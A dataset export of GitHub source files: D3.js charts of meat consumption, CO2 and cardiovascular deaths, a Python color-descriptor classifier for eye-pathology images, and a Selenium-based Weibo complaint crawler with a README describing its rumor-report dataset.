has acceleration), also: 'circle', 'elastic', 'bounce', 'linear'\n // .attr(\"cx\", function(d) {\n // return x_scale_s(d.meat_production); // Circle's X\n // })\n // .attr(\"cy\", function(d) {\n // return y_scale_s(d.Co2); // Circle's Y\n // })\n // .each(\"end\", function() { // End animation\n // d3.select(this) // 'this' means the current element\n // .transition()\n // .duration(500)\n // .attr(\"fill\", \"black\") // Change color\n // .attr(\"r\", 2); // Change radius\n // });\n\n svg_s.select('.x.axis_s')\n .transition(t)\n .call(x_axis_s);\n\n svg_s.select('.y.axis_s')\n .transition(t)\n .call(y_axis_s);\n\n}\n\n// ==========================================================================\n// Common code\n\nd3.csv('/static/meat_vs_co2.csv').then(function(data){\n all_csv_data_s = data;\n draw_scatter('2017');\n})\n\nvar slider = d3.select('#year');\nslider.on('change', function() {\n draw(this.value);\n draw_2(this.value);\n draw_scatter(this.value);\n});\n" }, { "alpha_fraction": 0.48946359753608704, "alphanum_fraction": 0.5202347040176392, "avg_line_length": 20.306121826171875, "blob_id": "5208704e3f551e8246043f4c2b3ea43539970ec6", "content_id": "d362ea27501e5f8713300ea9a6366704d68eba1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 8352, "license_type": "no_license", "max_line_length": 112, "num_lines": 392, "path": "/project-2-master/project-2-master/static/bar_interactive.js", "repo_name": "cloe5541/project-2", "src_encoding": "UTF-8", "text": "// Bar chart 1\n\nvar width = document.getElementById('barChart')\n .clientWidth;\nvar height = document.getElementById('barChart')\n .clientHeight;\n\nvar margin = {\n top: 10,\n bottom: 70,\n left: 70,\n right: 20\n}\n\nvar svg = d3.select('#barChart')\n .append('svg')\n .attr('width', width)\n .attr('height', height + 50)\n .append('g')\n .attr('transform', 'translate(' + margin.left + ',' + margin.top + ')');\n\nwidth = width - margin.left - margin.right;\nheight = height - margin.top - margin.bottom;\n\nvar data = {};\n\nvar x_scale = d3.scaleBand()\n .rangeRound([0, width])\n .padding(0.1);\n\nvar y_scale = d3.scaleLinear()\n .range([height, 0]);\n\nvar colour_scale = d3.scaleQuantile()\n .range([\"#ffffe5\", \"#fff7bc\", \"#fee391\", \"#fec44f\", \"#fe9929\", \"#ec7014\", \"#cc4c02\", \"#993404\", \"#662506\"]);\n\nvar y_axis = d3.axisLeft(y_scale);\nvar x_axis = d3.axisBottom(x_scale);\n\nsvg.append('g')\n .attr('class', 'x axis')\n .attr('transform', 'translate(0,' + height + ')');\n\nsvg.append('g')\n .attr('class', 'y axis');\n\n\n// X axis label\n\nvar labelArea = 110;\nvar tPadBot = 40;\nvar labelMargin = 100;\n\nsvg.append(\"g\").attr(\"class\", \"xText\");\n\n// xText will allows ut to select the group without excess code\nvar xText = d3.select(\".xText\");\n\nfunction xTextRefresh(){\n xText.attr(\n \"transform\",\n \"translate(\" +\n (width / 2) +\n \", \" +\n // (height - labelMargin - tPadBot) +\n (height + labelMargin) +\n \")\"\n )\n}\n\nxTextRefresh()\n\nxText\n .append(\"text\")\n .attr(\"y\", 0)\n .text(\"Countries\")\n\n// End x axis label\n\n\n// Y axis label\n\nvar labelArea = 100;\nvar leftTextX = -(margin.left / 2);\nvar leftTextY = height / 2 + labelArea * 1.5;\n\nsvg.append(\"g\").attr(\"class\", \"yText\");\n\nvar yText = d3.select(\".yText\");\n\nfunction yTextRefresh(){\n yText.attr(\n \"transform\",\n `translate(${leftTextX}, ${leftTextY}) rotate(-90)`\n )\n}\n\nyTextRefresh();\n\nyText\n .append(\"text\")\n .attr(\"y\", 0)\n 
.text(\"Meat Consumption Per Person (in Kg)\")\n\n// End Y axis label\n\nall_csv_data = {}\n\nfunction draw(year) {\n\n var t = d3.transition()\n .duration(2000);\n\n csv_data = all_csv_data.filter(function(d) {\n return d.Year == year;\n });\n\n var countries = csv_data.map(function(d) {\n return d.Entity;\n });\n x_scale = x_scale.domain(countries);\n\n var max_value = d3.max(csv_data, function(d) {\n return +d.Meat;\n });\n\n y_scale.domain([0, max_value]);\n colour_scale.domain([0, max_value]);\n\n var tip = d3.tip()\n .attr('class', 'd3-tip')\n .offset([-5, 0])\n .html(function(d) {\n var theState = `<div>${d.Entity}</div>`;\n var theY = `<div>Meat: ${d.Meat}Kg</div>`;\n return theState + theY;\n });\n svg.call(tip);\n\n var bars = svg.selectAll('.bar')\n .data(csv_data)\n\n bars\n .exit()\n .remove();\n\n var new_bars = bars\n .enter()\n .append('rect')\n .attr('class', 'bar')\n .attr('x', function(d) {\n return x_scale(d.Entity);\n })\n .attr('width', x_scale.bandwidth())\n .attr('y', height)\n .attr('height', 0)\n .on(\"mouseover\",function(d){\n tip.show(d,this);\n })\n .on(\"mouseout\", function(d){\n tip.hide(d)\n });\n\n new_bars.merge(bars)\n .transition(t)\n .attr('y', function(d) {\n return y_scale(+d.Meat);\n })\n .attr('height', function(d) {\n return height - y_scale(+d.Meat)\n })\n .attr('fill', function(d) {\n return colour_scale(+d.Meat);\n })\n\n svg.select('.x.axis')\n .call(x_axis)\n .selectAll(\"text\")\n .attr(\"y\", 15)\n .attr(\"x\", 0)\n .attr(\"dy\", \".35em\")\n .attr(\"transform\", \"rotate(45)\")\n .style(\"text-anchor\", \"start\");;\n\n svg.select('.y.axis')\n .transition(t)\n .call(y_axis);\n\n}\n\n// ==========================================================================\n// Bar chart 2\n\n\nvar width = document.getElementById('barChart2')\n .clientWidth;\nvar height = document.getElementById('barChart2')\n .clientHeight;\n\nvar margin = {\n top: 10,\n bottom: 70,\n left: 70,\n right: 20\n}\n\nvar svg2 = d3.select('#barChart2')\n .append('svg')\n .attr('width', width)\n .attr('height', height + 50)\n .append('g')\n .attr('transform', 'translate(' + margin.left + ',' + margin.top + ')');\n\nwidth = width - margin.left - margin.right;\nheight = height - margin.top - margin.bottom;\n\nvar data = {};\n\nvar x_scale2 = d3.scaleBand()\n .rangeRound([0, width])\n .padding(0.1);\n\nvar y_scale2 = d3.scaleLinear()\n .range([height, 0]);\n\nvar colour_scale2 = d3.scaleQuantile()\n .range([\"#d2e2fa\", \"#afc7ed\", \"#96b8f2\", \"#749adb\", \"#537cc2\", \"#385fa1\", \"#183c78\", \"#0b2857\", \"#001942\"]);\n\nvar y_axis2 = d3.axisLeft(y_scale2);\nvar x_axis2 = d3.axisBottom(x_scale2);\n\nsvg2.append('g')\n .attr('class', 'x axis2')\n .attr('transform', 'translate(0,' + height + ')');\n\nsvg2.append('g')\n .attr('class', 'y axis2');\n\n\n// X axis label\n\nvar labelArea = 110;\nvar tPadBot = 40;\nvar labelMargin = 100;\n\nsvg2.append(\"g\").attr(\"class\", \"xText2\");\n\n// xText will allows ut to select the group without excess code\nvar xText2 = d3.select(\".xText2\");\n\nfunction xText2Refresh(){\n xText2.attr(\n \"transform\",\n \"translate(\" +\n (width / 2) +\n \", \" +\n // (height - labelMargin - tPadBot) +\n (height + labelMargin) +\n \")\"\n )\n}\n\nxText2Refresh()\n\nxText2\n .append(\"text\")\n .attr(\"y\", 0)\n .text(\"Countries\")\n\n// End x axis label\n\n\n// Y axis label\n\nvar labelArea = 100;\nvar leftTextX = -(margin.left / 2);\nvar leftTextY = height / 2 + labelArea * 1.5;\n\nsvg2.append(\"g\").attr(\"class\", \"yText2\");\n\nvar yText2 = 
d3.select(\".yText2\");\n\nfunction yText2Refresh(){\n yText2.attr(\n \"transform\",\n `translate(${leftTextX}, ${leftTextY}) rotate(-90)`\n )\n}\n\nyText2Refresh();\n\nyText2\n .append(\"text\")\n .attr(\"y\", 0)\n .text(\"Cardiovascular Deaths (per 100,000 people)\")\n\n// End Y axis label\n\nall_csv_data = {}\n\nfunction draw_2(year) {\n\n var t = d3.transition()\n .duration(2000);\n\n csv_data = all_csv_data.filter(function(d) {\n return d.Year == year;\n });\n\n var countries = csv_data.map(function(d) {\n return d.Entity;\n });\n x_scale2 = x_scale2.domain(countries);\n\n var max_value = d3.max(csv_data, function(d) {\n return +d.Deaths;\n });\n\n y_scale2.domain([0, max_value]);\n colour_scale2.domain([0, max_value]);\n\n var tip = d3.tip()\n .attr('class', 'd3-tip')\n .offset([-5, 0])\n .html(function(d) {\n var deaths = parseFloat(d.Deaths).toFixed(2);\n var theState = `<div>${d.Entity}</div>`;\n var theY = `<div>Deaths: ${deaths} people</div>`;\n return theState + theY;\n });\n svg.call(tip);\n\n var bars = svg2.selectAll('.bar')\n .data(csv_data)\n\n bars\n .exit()\n .remove();\n\n var new_bars = bars\n .enter()\n .append('rect')\n .attr('class', 'bar')\n .attr('x', function(d) {\n return x_scale2(d.Entity);\n })\n .attr('width', x_scale2.bandwidth())\n .attr('y', height)\n .attr('height', 0)\n .on(\"mouseover\",function(d){\n tip.show(d,this);\n })\n .on(\"mouseout\", function(d){\n tip.hide(d)\n });;\n\n new_bars.merge(bars)\n .transition(t)\n .attr('y', function(d) {\n return y_scale2(+d.Deaths);\n })\n .attr('height', function(d) {\n return height - y_scale2(+d.Deaths)\n })\n .attr('fill', function(d) {\n return colour_scale2(+d.Deaths);\n })\n\n svg2.select('.x.axis2')\n .call(x_axis2)\n .selectAll(\"text\")\n .attr(\"y\", 15)\n .attr(\"x\", 0)\n .attr(\"dy\", \".35em\")\n .attr(\"transform\", \"rotate(45)\")\n .style(\"text-anchor\", \"start\");;\n\n svg2.select('.y.axis2')\n .transition(t)\n .call(y_axis2);\n\n}\n\n\n// ==========================================================================\n// Common code\n\nd3.csv('/static/cardio_top_yrs.csv').then(function(data){\n all_csv_data = data;\n draw('2017');\n draw_2('2017');\n})\n" } ]
3
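The two interactive charts in the record above follow one D3 pattern: load a CSV once, then on every slider change filter the rows to a single Year and rescale the axes to that year's maxima. Below is a minimal pandas sketch of the same selection; it is illustrative only (the repo does this in the browser, not on the server), and the column names Year, meat_production and Co2 are taken from the d3 accessors above.

# Hypothetical helper, not part of the repo: mirrors the year filter and the
# axis-domain computation done by x_scale_s / y_scale_s in scatter_interactive.js.
import pandas as pd

def year_slice(csv_path, year):
    df = pd.read_csv(csv_path)
    rows = df[df["Year"] == year]                    # csv_data = all_csv_data_s.filter(...)
    x_domain = (0, rows["meat_production"].max())    # x_scale_s.domain([0, max_x_value])
    y_domain = (0, rows["Co2"].max())                # y_scale_s / color_scale_s domain
    return rows, x_domain, y_domain

# e.g. rows, xd, yd = year_slice("static/meat_vs_co2.csv", 2017)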
cmanfeed/Scientific-Research
https://github.com/cmanfeed/Scientific-Research
8ffb688ee0c005e1ab046cda6ecc42e8bfcee575
6e644daeb637732800a0c96c3981c2008ed18580
76c41ecddc8b8daaa383fbf537f478ac1ebaaf73
refs/heads/main
2023-04-23T05:05:17.746455
2021-05-03T22:42:19
2021-05-03T22:42:19
362,592,198
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5481147766113281, "alphanum_fraction": 0.556555986404419, "avg_line_length": 29.457143783569336, "blob_id": "e77cafe138542312bc7cb8c71359acf85bbef3c9", "content_id": "6b05db447a70aadcebd53dd968cdc9ae311ac0ff", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5331, "license_type": "permissive", "max_line_length": 115, "num_lines": 175, "path": "/Detecção de Patologias Oculares em Imagens Reflexo Vermelho Utilizando Descritores de Cor/main.py", "repo_name": "cmanfeed/Scientific-Research", "src_encoding": "UTF-8", "text": "import numpy as np\nimport os\nimport cv2\nimport sklearn.metrics import confusion_matrix\nfrom extract_features import *\nfrom sklearn.model_selection import KFold\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.svm import SVC\nfrom xgboost import XGBClassifier\n\ndef load_pacients(n_path, p_path):\n normal = []\n problm = []\n\n for file in os.listdir(n_path):\n eyes = [cv2.imread(n_path + '/' + file + '/' + eye) for eye in os.listdir(n_path + '/' + file)]\n normal.append(eyes)\n \n for file in os.listdir(p_path):\n eyes = [cv2.imread(p_path + '/' + file + '/' + eye) for eye in os.listdir(p_path + '/' + file)]\n problm.append(eyes)\n \n return normal, problm\n\n\ndef load_masks(normal, nm_path, problm, pm_path):\n normal_m = []\n problm_m = []\n\n for patient, maskfile in zip(normal, os.listdir(nm_path)):\n eyes = []\n for pac_eye, mask_eye in zip(patient, os.listdir(nm_path + '/' + maskfile)):\n mask = cv2.imread(nm_path + '/' + maskfile + '/' + mask_eye, 0)\n eyem = cv2.bitwise_and(pac_eye, pac_eye, mask=mask)\n eyes.append(eyem)\n\n normal_m.append(eyes)\n \n for patient, maskfile in zip(problm, os.listdir(pm_path)):\n eyes = []\n for pac_eye, mask_eye in zip(patient, os.listdir(pm_path + '/' + maskfile)):\n mask = cv2.imread(pm_path + '/' + maskfile + '/' + mask_eye, 0)\n eyem = cv2.bitwise_and(pac_eye, pac_eye, mask=mask)\n eyes.append(eyem)\n\n problm_m.append(eyes)\n\n return normal_m, problm_m\n\n\ndef filter_transform(normal, problm, filt, spec):\n normal_pre = []\n problm_pre = []\n \n for patient in normal:\n eyes = [filt.apply(eye) for eye in patient]\n eyes = [spec.apply(eye) for eye in eyes]\n\n normal_pre.append(eyes)\n \n for patient in problm:\n eyes = [filt.apply(eye) for eye in patient]\n eyes = [spec.apply(eye) for eye in eyes]\n\n problm_pre.append(eyes)\n\n return normal_pre, problm_pre\n\ndef get_features(normal, problm, desc):\n X = []\n\n for patient in normal:\n feats = [desc.apply(eye) for eye in patient]\n X.append(feats)\n \n for patient in problm:\n feats = [desc.apply(eye) for eye in patient]\n X.append(feats)\n\n X = np.array(X)\n y = np.concatenate((np.zeros(len(normal), dtype=int),\n np.ones(len(problm), dtype=int)))\n \n return X, y\n\ndef unstack_features(X, y):\n X_unstk = []\n y_unstk = []\n\n for x_elm, y_elm in zip(X, y):\n for x_elm_sub in x_elm:\n X_unstk.append(x_elm_sub)\n y_unstk.append(y_elm)\n\n return np.array(X_unstk), np.array(y_unstk)\n\ndef distance_calc(x_test, y_pred, x_rgbfeats, test):\n y_pred_final = []\n\n for i, j in zip(range(0, len(y_pred), 2), range(6)):\n if y_pred[i] == 0 and y_pred[i+1] == 0:\n dist = np.linalg.norm(x_rgbfeats[test[j]][0] - x_rgbfeats[test[j]][1])\n if dist > 700:\n y_pred_final.append(1)\n else:\n y_pred_final.append(0)\n else:\n y_pred_final.append(1)\n \n return y_pred_final\n\n\nif __name__ == '__main__':\n\n filt = PreProcess('clahe')\n spec = TransformSpectrum('lab')\n desc = 
ColorDescriptor('imoments')\n\n    # Getting best features with best params\n    normal, problm = load_pacients('./data pacients/olhos/normal',\n                                   './data pacients/olhos/problema')\n\n    normal, problm = filter_transform(normal, problm, filt, spec)\n\n    normal, problm = load_masks(normal, './data pacients/marcacoes/normal',\n                                problm, './data pacients/marcacoes/problema')\n\n    X, y = get_features(normal, problm, desc)\n\n    # Getting RGB features\n    normal, problm = load_pacients('./data pacients/olhos/normal',\n                                   './data pacients/olhos/problema')\n    \n    normal, problm = load_masks(normal, './data pacients/marcacoes/normal',\n                                problm, './data pacients/marcacoes/problema')\n\n    X_rgb, _ = get_features(normal, problm, desc)\n\n    # Validation metrics\n    pre, sen, esp, acc = ([] for i in range(4))\n\n    # Generating Cross Validation (K = 10)\n    cv = KFold(n_splits=10, random_state=40, shuffle=True)\n\n    for train, test in cv.split(X, y):\n        x_tran, y_tran = unstack_features(X[train], y[train])\n        x_test, y_test = unstack_features(X[test], y[test])\n\n        model = XGBClassifier(objective='binary:logistic',verbosity=0, use_label_encoder=False).fit(x_tran, y_tran)\n        \n        y_pred = model.predict(x_test)\n        y_pred_final = distance_calc(x_test, y_pred, X_rgb, test)\n\n        cf = np.array([[0, 0], [0, 0]])\n        if all(y[test] == y_pred_final):\n            cf[0][0] += sum(y_pred == 0)\n            cf[1][1] += sum(y_pred == 1)\n        else:\n            cf += confusion_matrix(y[test], y_pred_final)\n\n        tn, fp, fn, tp = cf.ravel()\n\n        if tp + fp > 0:\n            pre.append(tp / (tp + fp))\n        else:\n            pre.append(0)\n        if tp + fn > 0:\n            sen.append(tp / (tp + fn))\n        else:\n            sen.append(0)\n\n        esp.append(tn / (tn + fp))\n        acc.append((tp + tn) / (tp + tn + fp + fn))\n\n    print(np.mean(pre), np.mean(sen), np.mean(esp), np.mean(acc))\n\n" }, { "alpha_fraction": 0.5368649363517761, "alphanum_fraction": 0.5472428798675537, "avg_line_length": 26.83189582824707, "blob_id": "b8101a1fc6d8b241ce0034f889730b7cdbfc3428", "content_id": "86369a415fdda2b860a9d1c891bc97801b6c4405", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6456, "license_type": "permissive", "max_line_length": 90, "num_lines": 232, "path": "/Detecção de Patologias Oculares em Imagens Reflexo Vermelho Utilizando Descritores de Cor/extract_features.py", "repo_name": "cmanfeed/Scientific-Research", "src_encoding": "UTF-8", "text": "import glob\nimport cv2\nimport numpy as np\n\nfrom sklearn.cluster import KMeans\nfrom scipy.stats import skew, kurtosis\n\nfrom hyperopt import hp\nfrom xgboost import XGBClassifier\nfrom sklearn.linear_model import RidgeClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import RandomForestClassifier\n\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import KFold\nfrom sklearn import metrics\nimport statistics\n\nclass PreProcess():\n\n    def __init__(self, method):\n        self.method = method\n\n    def _hist_eqlize(self, img):\n        return cv2.merge(([cv2.equalizeHist(ch)\n                           for ch in cv2.split(img)]))\n\n    def _cont_clahe(self, img):\n        clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))\n\n        lab = cv2.cvtColor(img, cv2.COLOR_BGR2LAB)\n        lab[..., 0] = clahe.apply(lab[..., 0])\n\n        return cv2.cvtColor(lab, cv2.COLOR_LAB2BGR)\n\n    def _oppt_colors(self, img):\n        return 255 - img\n\n    def apply(self, img):\n\n        if self.method == 'eqlze':\n            return self._hist_eqlize(img)\n        \n        elif self.method == 'clahe':\n            return self._cont_clahe(img)\n        \n        elif self.method == 
'oppcl':\n            return self._oppt_colors(img)\n        \n        elif self.method == 'nopre':\n            return img\n\n\nclass TransformSpectrum():\n\n    def __init__(self, method):\n        self.method = method\n\n    def apply(self, img):\n\n        if self.method == 'hsv':\n            return cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n        \n        elif self.method == 'lab':\n            return cv2.cvtColor(img, cv2.COLOR_BGR2Lab)\n        \n        elif self.method == 'bgr':\n            return img\n\n\nclass ApplyMask():\n\n    def __init__(self, method):\n        self.method = method\n\n    def _app_mask(self, imgs_n, imgs_p):\n\n        masks_n = [cv2.imread(file, 0)\n                   for file in glob.iglob('./data/marcacoes/normal/*.jpg')]\n        masks_p = [cv2.imread(file, 0)\n                   for file in glob.iglob('./data/marcacoes/problema/*.jpg')]\n\n        n_with_mask = [cv2.bitwise_and(img, img, mask=mask)\n                       for img, mask in zip(imgs_n, masks_n)]\n        p_with_mask = [cv2.bitwise_and(img, img, mask=mask)\n                       for img, mask in zip(imgs_p, masks_p)]\n\n        return n_with_mask, p_with_mask\n\n    def apply(self, imgs_n, imgs_p):\n\n        if self.method == 'appmask':\n            return self._app_mask(imgs_n, imgs_p)\n\n        return imgs_n, imgs_p\n\n\nclass ColorDescriptor():\n\n    def __init__(self, method):\n        self.method = method\n\n    def _clr_histgram(self, img):\n        hist = [cv2.calcHist([ch], [0], None, [256], [0, 256])\n                for ch in cv2.split(img)]\n        flat = [elm for h in hist for elm in h]\n\n        return np.concatenate(np.array(flat), axis=0)\n\n    def _clr_dominant(self, img):\n        img = img.reshape((img.shape[0] * img.shape[1], 3))\n        clt = KMeans(n_clusters=3)\n        clt.fit(img)\n\n        numLabels = np.arange(0, len(np.unique(clt.labels_)) + 1)\n        (hist, _) = np.histogram(clt.labels_, bins=numLabels)\n\n        hist = hist.astype(\"float\")\n        hist /= hist.sum()\n        centers = np.concatenate(clt.cluster_centers_, axis=0)\n\n        return np.concatenate((centers, hist), axis=0)\n\n    def _clr_imoment(self, img):\n\n        means = [np.mean(ch) for ch in cv2.split(img)]\n        varis = [np.var(ch) for ch in cv2.split(img)]\n        skews = [skew(ch.reshape(-1)) for ch in cv2.split(img)]\n        kurts = [kurtosis(ch.reshape(-1)) for ch in cv2.split(img)]\n\n        moments = means + varis + skews + kurts\n        return np.array(moments)\n\n    def _clr_all(self, img):\n        return np.concatenate((self._clr_histgram(img),\n                               self._clr_dominant(img),\n                               self._clr_imoment(img)), axis=None)\n    \n    def _clr_imoment_dominant(self, img):\n        return np.concatenate((self._clr_dominant(img),\n                               self._clr_imoment(img)), axis=None)\n    \n\n    def apply(self, img):\n\n        if self.method == 'histogrm':\n            return self._clr_histgram(img)\n\n        elif self.method == 'dominant':\n            return self._clr_dominant(img)\n\n        elif self.method == 'imoments':\n            return self._clr_imoment(img)\n        \n        elif self.method == 'alldescp':\n            return self._clr_all(img)\n        \n        elif self.method == 'imondomt':\n            return self._clr_imoment_dominant(img)\n\n\nclass Classifier():\n\n    def __init__(self, name):\n        self.name = name\n    \n    def _create_XGB(self):\n        clf = XGBClassifier(objective='binary:logistic',\n                            verbosity=0, use_label_encoder=False)\n        return clf\n    \n    def _create_ridge(self):\n        clf = RidgeClassifier()\n        return clf\n\n    def _create_linearDA(self):\n        clf = LinearDiscriminantAnalysis()\n        return clf\n    \n    def _create_SVM(self):\n        clf = SVC(kernel='rbf')\n        return clf\n\n    def _create_RandomForest(self):\n        clf = RandomForestClassifier()\n        return clf\n\n\n    def get_scores(self, X, y):\n        clf = self.apply()\n        cv = KFold(n_splits=10, random_state=42, shuffle=True)\n        \n        pre, acc, sen, esp = ([] for i in range(4))\n\n        for (train, test) in cv.split(X, y):\n            model = clf.fit(X[train], y[train])\n            predict_test_class = model.predict(X[test])\n\n            tn, fp, 
fn, tp = metrics.confusion_matrix(y[test], predict_test_class).ravel()\n \n if tp + fp > 0:\n pre.append(tp / (tp + fp))\n else:\n pre.append(0)\n \n if tp + fn > 0:\n sen.append(tp / (tp + fn))\n else:\n sen.append(0)\n\n esp.append(tn / (tn + fp))\n acc.append((tp + tn) / (tp + tn + fp + fn))\n\n return np.mean(acc), np.mean(sen), np.mean(esp)\n \n def apply(self):\n\n if self.name == 'xgboost':\n return self._create_XGB()\n \n elif self.name == 'ridgecl':\n return self._create_ridge()\n \n elif self.name == 'linarDA':\n return self._create_linearDA()\n\n elif self.name == 'svm':\n return self._create_SVM()\n\n elif self.name == 'randomforest':\n return self._create_RandomForest()" }, { "alpha_fraction": 0.8613861203193665, "alphanum_fraction": 0.8613861203193665, "avg_line_length": 49.5, "blob_id": "32cf34443a53939924662ec6d6e4075a06c9b901", "content_id": "32b571a55ec33427be33c5377c1ecc13438cd6e9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 103, "license_type": "permissive", "max_line_length": 78, "num_lines": 2, "path": "/README.md", "repo_name": "cmanfeed/Scientific-Research", "src_encoding": "UTF-8", "text": "# Scientific-Research\nProjetos de pesquisa científica realizados na Universidade Federal do Maranhão\n" } ]
3
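The ColorDescriptor('imoments') path in the record above reduces each masked eye image to per-channel colour moments. A self-contained sketch of that 12-dimensional descriptor follows; it uses plain numpy/scipy indexing instead of cv2.split so it runs without OpenCV, but the moment order (all means, then variances, skewnesses, kurtoses) matches _clr_imoment above.

# Illustrative re-implementation, not the repo's code.
import numpy as np
from scipy.stats import skew, kurtosis

def color_moments(img):
    # img: H x W x 3 array (BGR channel order when loaded with cv2.imread);
    # one moment quadruple (mean, variance, skewness, kurtosis) per channel.
    chans = [img[..., c].ravel().astype(float) for c in range(img.shape[-1])]
    means = [np.mean(ch) for ch in chans]
    varis = [np.var(ch) for ch in chans]
    skews = [skew(ch) for ch in chans]
    kurts = [kurtosis(ch) for ch in chans]
    return np.array(means + varis + skews + kurts)

# Sanity check on random data: color_moments(np.random.rand(64, 64, 3)).shape == (12,)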
simoncos/weibo-complaint-crawler
https://github.com/simoncos/weibo-complaint-crawler
19528d442b112a5af63d719ee19ac4eb40cec253
93d30896581bbfea1ebc8672600c13b5646cc721
f15bcaa00427496da1538e6964049b1598b1b779
refs/heads/master
2023-03-30T11:06:26.640453
2023-03-26T03:22:05
2023-03-26T03:22:05
148,573,117
12
2
null
null
null
null
null
[ { "alpha_fraction": 0.5993091464042664, "alphanum_fraction": 0.5993091464042664, "avg_line_length": 24.217391967773438, "blob_id": "da100c11968a14f8f7733e166fe0b1825d1b4091", "content_id": "089c707c086bf3b4cf888d444899feaa6ce6955f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 579, "license_type": "no_license", "max_line_length": 58, "num_lines": 23, "path": "/cookie.py", "repo_name": "simoncos/weibo-complaint-crawler", "src_encoding": "UTF-8", "text": "import time\nfrom selenium import webdriver\n\nfrom driver import getChrome\n\n\nclass Cookie(object):\n url = 'http://weibo.com/login.php'\n def __init__(self):\n self.browser = getChrome()\n\n def getWeiboCookie(self):\n cookie_dic = {}\n cookies = self.browser.get_cookies()\n self.browser.close()\n for cookie in cookies:\n if 'name' in cookie and 'value' in cookie:\n cookie_dic[cookie['name']]=cookie['value']\n return cookie_dic\n\nif __name__ == '__main__':\n cookie = Cookie()\n print(cookie.getWeiboCookie())" }, { "alpha_fraction": 0.3759876787662506, "alphanum_fraction": 0.4765850901603699, "avg_line_length": 29.523529052734375, "blob_id": "730b4c70508a7ef037654334f5b06acc28f57470", "content_id": "8a6b3bf8bfc3eec3c42eda47f9a2a5994b4f7431", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6193, "license_type": "no_license", "max_line_length": 295, "num_lines": 170, "path": "/README.md", "repo_name": "simoncos/weibo-complaint-crawler", "src_encoding": "UTF-8", "text": "# weibo-complaint-crawler\n\nPython 3.6+\n\n### Data Source\n\n[微博社区管理中心(Weibo Community Managment Center)](http://service.account.weibo.com/) (now https: https://service.account.weibo.com/)\n\n### Dataset (36,075, up to 2018-08-30)\n\n- [Baidu](https://pan.baidu.com/s/1raeGg5giL4ov8kJqxqpg5g)\n- code: 1024\n\nSample:\n\n```mongodb\n{ \n \"_id\" : ObjectId(\"5b9b5f0219172c1ee4ec682d\"), \n \"url\" : \"http://service.account.weibo.com/show?rid=K1CaP8wxf7K4j\", \n \"title\" : \"@yvonne爱吃可丽饼 举报@每日上海 不实信息\", \n \"reports\" : [\n {\n \"reporter_url\" : \"http://weibo.com/u/6154858995\", \n \"reporter_name\" : \"漳州普法\", \n \"reporter_img_url\" : \"https://tvax1.sinaimg.cn/crop.6.8.86.86.50/006Ix9Zhly8fd75vcxu9oj302s02sglq.jpg\", \n \"reporter_gender\" : \"male\", \n \"reporter_location\" : \"福建 漳州\", \n \"reporter_description\" : \"漳州普法官方微博\", \n \"report_time\" : \"2018-08-30 12:47\", \n \"report_text\" : \"漳州普法:#微博辟谣# 不实消息,公安机关已经辟谣! 
.\"\n }, \n {\n \"reporter_url\" : \"http://weibo.com/u/2126421215\", \n \"reporter_name\" : \"疯丫头小Ann\", \n \"reporter_img_url\" : \"https://tva3.sinaimg.cn/crop.0.0.640.640.50/7ebe9cdfjw8eg2ht89dz0j20hs0hs74s.jpg\", \n \"reporter_gender\" : \"female\", \n \"reporter_location\" : \"海外 新加坡\", \n \"reporter_description\" : \"酷爱彩妆,护肤!坡县幸福小吃货一枚!\", \n \"report_time\" : \"2018-08-30 12:03\", \n \"report_text\" : \"疯丫头小Ann:#微博辟谣# 有人辟谣了 实际发生地点与人物都和宣传文案不一致 .\"\n }, \n {\n \"reporter_url\" : \"http://weibo.com/u/1433584002\", \n \"reporter_name\" : \"yvonne爱吃可丽饼\", \n \"reporter_img_url\" : \"https://tvax1.sinaimg.cn/crop.0.0.1125.1125.50/5572c182ly8futbpkmiq3j20v90v9acv.jpg\", \n \"reporter_gender\" : \"female\", \n \"reporter_location\" : \"海外 美国\", \n \"reporter_description\" : \"Love is just a word until someone special gives it a meaning.\", \n \"report_time\" : \"2018-08-30 10:57\", \n \"report_text\" : \"yvonne爱吃可丽饼:#微博辟谣# 假信息 .\"\n }\n ], \n \"actual_reporter_count\" : NumberInt(3), \n \"rumor\" : {\n \"rumorer_name\" : \"每日上海\", \n \"rumorer_url\" : \"http://weibo.com/u/2128372947\", \n \"rumorer_gender\" : \"female\", \n \"rumorer_location\" : \"上海\", \n \"rumorer_description\" : \"关注每日上海,乐享潮流资讯。合作联系+Q: 2605326688\", \n \"rumor_time\" : \"2018-08-30 09:58:32\", \n \"rumor_url\" : \"http://weibo.com/2128372947/Gx0aVsVJp\", \n \"rumor_text\" : \"每日上海 :2018年情人节当天,位于安徽省芜湖广电大厦地下停车场内,42岁女主播与54岁副总编在车内讨论工作,结果由于车内空间狭小,男的太激动,导致突发心梗去世…[doge]\"\n }, \n \"official\" : {\n \"official_text\" : \"经查,此微博称“位于安徽省芜湖广电大厦地下停车场内,42岁女主播与54岁副总编在车内讨论工作,导致突发心梗去世”不实。@德州运河公安分局 已辟谣:视频中并非芜湖广电大厦地下停车场,且该单位未发生副总编死亡事件 。详情:https://weibo.com/2403912521/Gw7zhxxIm 。被举报人言论构成“发布不实信息”。现根据《微博举报投诉操作细则》(http://service.account.weibo.com/roles/xize )第19条,对被举报人处理如下:扣除信用积分2分。上述处理在公布后60分钟内生效。\"\n }, \n \"looks\" : [\n [\n \"http://weibo.com/u/5872248592\", \n \"simoncV\"\n ], \n [\n \"http://weibo.com/u/3221034714\", \n \"爱吃肉的牙牙兔\"\n ], \n [\n \"http://weibo.com/u/6683056792\", \n \"mustard178\"\n ], \n [\n \"http://weibo.com/u/2102315083\", \n \"_周涵_\"\n ], \n [\n \"http://weibo.com/u/5836275950\", \n \"决恋星辰98217\"\n ], \n [\n \"http://weibo.com/u/1710759290\", \n 